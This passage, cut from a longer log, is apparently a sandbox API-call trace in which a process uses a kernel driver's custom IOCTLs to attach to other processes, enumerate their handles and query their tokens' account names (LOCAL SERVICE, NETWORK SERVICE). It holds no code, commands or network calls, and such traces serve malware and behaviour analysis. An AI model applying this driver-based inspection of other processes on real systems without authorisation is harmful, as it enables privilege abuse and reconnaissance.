hHeap=0x290000) returned 1 [0140.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0140.379] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.379] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0140.379] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.379] PsAcquireProcessExitSynchronization () returned 0x0 [0140.379] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0) [0140.380] ObReferenceObjectByHandle (in: Handle=0x8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003847900, HandleInformation=0x0) returned 0x0 [0140.380] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.380] PsReleaseProcessExitSynchronization () returned 0x2 [0140.380] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3e [0140.380] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f73504, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f73504, ReturnLength=0xfffff88005163508) returned 0x0 [0140.380] ObfDereferenceObject (Object=0xfffffa8003847900) returned 0x1 [0140.380] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.380] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.380] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0140.380] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.381] PsAcquireProcessExitSynchronization () returned 0x0 [0140.381] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0) [0140.381] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003848c40, HandleInformation=0x0) returned 0x0 [0140.381] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.381] PsReleaseProcessExitSynchronization () returned 0x2 [0140.381] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3e [0140.381] ObQueryNameString (in: Object=0xfffffa8003848c40, ObjectNameInfo=0xfffffa8002f7e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7e044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.381] ObfDereferenceObject (Object=0xfffffa8003848c40) returned 0x11 [0140.381] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.381] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.381] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0140.382] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.382] PsAcquireProcessExitSynchronization () returned 0x0 [0140.382] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0) [0140.382] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800384cc80, HandleInformation=0x0) returned 0x0 [0140.855] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.855] PsReleaseProcessExitSynchronization () returned 0x2 [0140.855] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3e [0140.855] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80030c7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c7044, ReturnLength=0xfffff88005163508) returned 0x0 [0140.855] ObfDereferenceObject (Object=0xfffffa800384cc80) returned 0x1 [0140.855] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.855] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.855] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.855] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0140.855] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.855] PsAcquireProcessExitSynchronization () returned 0x0 [0140.855] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0) [0140.856] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0140.856] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.856] PsReleaseProcessExitSynchronization () returned 0x2 [0140.856] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3e [0140.856] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163550) returned 0x0 [0140.856] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0140.856] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.856] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.856] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.856] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0140.856] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.856] PsAcquireProcessExitSynchronization () returned 0x0 [0140.856] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880051635d0) [0140.856] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0140.856] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.856] PsReleaseProcessExitSynchronization () returned 0x2 [0140.856] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3e [0140.857] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.857] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0140.857] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.857] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc8) returned 0xc8 [0140.857] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0140.857] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80038b5b30, HandleInformation=0x0) returned 0x0 [0140.857] ObOpenObjectByPointer (in: Object=0xfffffa80038b5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000868) returned 0x0 [0140.857] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xd2 [0140.857] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000868, DesiredAccess=0x8, TokenHandle=0xfffffa8003a40b80 | out: TokenHandle=0xfffffa8003a40b80*=0xc4) returned 0x0 [0140.857] ZwClose (Handle=0xffffffff80000868) returned 0x0 [0140.857] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.857] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0140.858] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0141.586] CloseHandle (hObject=0xc4) returned 1 [0141.586] CloseHandle (hObject=0xc8) returned 1 [0141.586] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0141.586] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.586] PsAcquireProcessExitSynchronization () returned 0x0 [0141.586] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0) [0141.586] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003664470, HandleInformation=0x0) returned 0x0 [0141.586] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.586] PsReleaseProcessExitSynchronization () returned 0x2 [0141.586] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xd0 [0141.586] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fc7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fc7044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.586] ObfDereferenceObject (Object=0xfffffa8003664470) returned 0x1 [0141.586] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.587] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.587] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0141.587] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.587] PsAcquireProcessExitSynchronization () returned 0x0 [0141.587] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0) [0141.587] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8009e52310, HandleInformation=0x0) returned 0x0 [0141.587] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.587] PsReleaseProcessExitSynchronization () returned 0x2 [0141.587] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xd0 [0141.587] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163508) returned 0x0 [0141.587] ObfDereferenceObject (Object=0xfffffa8009e52310) returned 0x1 [0141.587] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.587] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.587] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0141.587] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.587] PsAcquireProcessExitSynchronization () returned 0x0 [0141.587] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0) [0141.587] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038e3da0, HandleInformation=0x0) returned 0x0 [0141.587] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.587] PsReleaseProcessExitSynchronization () returned 0x2 [0141.587] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xd0 [0141.587] ObQueryNameString (in: Object=0xfffffa80038e3da0, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.587] ObfDereferenceObject (Object=0xfffffa80038e3da0) returned 0x1 [0141.587] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.587] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.587] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0141.588] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.588] PsAcquireProcessExitSynchronization () returned 0x0 [0141.588] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0) [0141.588] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0141.588] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.588] PsReleaseProcessExitSynchronization () returned 0x2 [0141.588] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xd0 [0141.588] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80030c7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c7044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.588] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0141.588] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.588] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.588] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0141.588] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.588] PsAcquireProcessExitSynchronization () returned 0x0 [0141.588] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0) [0141.588] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0141.588] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.588] PsReleaseProcessExitSynchronization () returned 0x2 [0141.588] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xd0 [0141.588] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa80026a57c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026a57c4, ReturnLength=0xfffff88005163550) returned 0x0 [0141.589] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0141.589] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.589] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.589] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0141.589] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.589] PsAcquireProcessExitSynchronization () returned 0x0 [0141.589] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880051635d0) [0141.589] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039cf710, HandleInformation=0x0) returned 0x0 [0141.589] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.589] PsReleaseProcessExitSynchronization () returned 0x2 [0141.589] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xd0 [0141.589] ObQueryNameString (in: Object=0xfffffa80039cf710, ObjectNameInfo=0xfffffa8002fc8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc8044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.589] ObfDereferenceObject (Object=0xfffffa80039cf710) returned 0x1 [0141.589] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.589] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x11c) returned 0xc8 [0141.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0141.589] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80038c8b30, HandleInformation=0x0) returned 0x0 [0141.589] ObOpenObjectByPointer (in: Object=0xfffffa80038c8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000868) returned 0x0 [0141.589] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb6 [0141.590] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000868, DesiredAccess=0x8, TokenHandle=0xfffffa8001eba240 | out: TokenHandle=0xfffffa8001eba240*=0xc4) returned 0x0 [0141.590] ZwClose (Handle=0xffffffff80000868) returned 0x0 [0141.590] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.590] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0141.590] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0141.591] CloseHandle (hObject=0xc4) returned 1 [0141.591] CloseHandle (hObject=0xc8) returned 1 [0141.591] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0141.592] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.592] PsAcquireProcessExitSynchronization () returned 0x0 [0141.592] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.592] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003429af0, HandleInformation=0x0) returned 0x0 [0141.592] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.593] PsReleaseProcessExitSynchronization () returned 0x2 [0141.593] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.593] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fc5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fc5044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.593] ObfDereferenceObject (Object=0xfffffa8003429af0) returned 0x1 [0141.593] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.593] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.593] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0141.593] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.593] PsAcquireProcessExitSynchronization () returned 0x0 [0141.593] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.593] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038df930, HandleInformation=0x0) returned 0x0 [0141.593] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.593] PsReleaseProcessExitSynchronization () returned 0x2 [0141.593] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.593] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002fc4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fc4044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.593] ObfDereferenceObject (Object=0xfffffa80038df930) returned 0x1 